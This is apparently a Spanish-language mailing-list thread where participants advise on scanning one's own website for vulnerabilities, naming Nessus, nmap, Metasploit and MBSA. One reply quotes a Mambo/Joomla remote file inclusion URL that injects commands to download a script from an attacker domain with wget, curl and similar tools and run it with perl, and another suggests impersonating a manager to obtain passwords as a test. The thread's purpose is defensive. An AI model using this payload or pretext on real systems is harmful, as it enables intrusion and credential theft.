Alberto Rivera wrote: > Asdtaker wrote: >> Estimados, alguien tiene idea de los aspecto de debiese considerar a >> la hora >> de realizar un escaneo de vulnerabilidades a mi sitio web? >> >> Por ahora considero estos ITEMs: >> >> - Ingenieria Social: informacion disponible en la web. >> - Archivos por defecto: todo aquello que viene con la instalacion en >> bruto >> del server web. >> - Extensiones por defecto: analizar el impacto de soportar distintas >> extensiones. >> - Sesiones: comprobar validez de sesiones, etc. >> - Manejo de errores: de aplicacion y servidor. >> - SQL Injection. >> >> >> Gracias por sus comentarios. >> > Mira toma nessus y lo corres desde el exterior y después desde el > interior de la organización esto te va a encontrar varias > vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y > tratar de insertar exploits conocidos a servicios conocidos desde dentro > y afuera cada vez, prueba varias herramientas en contra de tu sitio, > trata de explotarlo de forma controlada, o sea, no lo hagas cuando estén > todos trabajando ... esto te va a entregar una visión un poco más > específica de cualquier problemática que puedas tener.
Metasploit tiene buen desarrollo ahora. Tambien una utilidad que tiene la gente de Microsoft MBSA (Microsoft Baseline Analyzer) http://www.microsoft.com/spain/technet/seguridad/herramientas/mbsa.mspx > Ahora para el > desarrollo propiamente tal, prueba inyecciones de mysql, php y > vulnerabilidades de javascript o ajax o lo que tengas, para hacer > inyecciones de forma remota hay varias formas de hacerlo y están super > documentadas incluso en youtube puedes encontrar videos bastante buenos > ... a nivel de servidor elimina cualquier software que sirva para bajar > cosas del internet para que no te puedan ejecutar ningún código dentro > de la máquina Borrar ftp ? Un atacante con habilidades te crea un socket en ASP y adios downloaders. > y para que imposibilites a los atacantes a hacer cosas > como esta : > > http://tudominio/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d= > > > 1&GLOBALS=&mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?&cmd=cd%20/tmp; > > > wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; > curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; > > > lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; > > > GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; > lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; > > > links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; > > > perl%20spkat.txt > Eso son casos especificos de explotacion de Mambo o Joomla con RFI. Él dejo en claro hace rato que esta trabajando con IIS, asi que los wget, curl -O, etc( que hacen lo mismo ), no tendrian validez, aunque explotaciones de RFI sobre Windows dan resultado pero son un poco mas rebuscadas. > si te fijas aquí el atacante no se fija ni en ingeniería social ni en > datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu sitio > tiene permiso de ejecutar cualquiera de las aplicaciones de descarga o > navegación, con esto baja un paquete, para el ejemplo spkat.txt y > después lo ejecuta con perl. El spkat lo que hace es abrir puertos, > levantar servicios, ejecutar troyanos dentro de la máquina o cualquier > cosa .... > > Ahora lo de la ingeniera social es para cuestiones super puntuales por > ejemplo, para conseguir acceso a un sistema en red, por ejemplo llamas a > la secretaria de administración y le dices que eres el gerente de > operaciones y le pides un nombre de usuario y password del sistema, así > puedes ver realmente cual es el nivel de seguridad que cuentas de parte > de los usuarios ... pero la ing. social no es encontrar información en > internet. > > eso, espero te sirva > > salu2 >> >> >>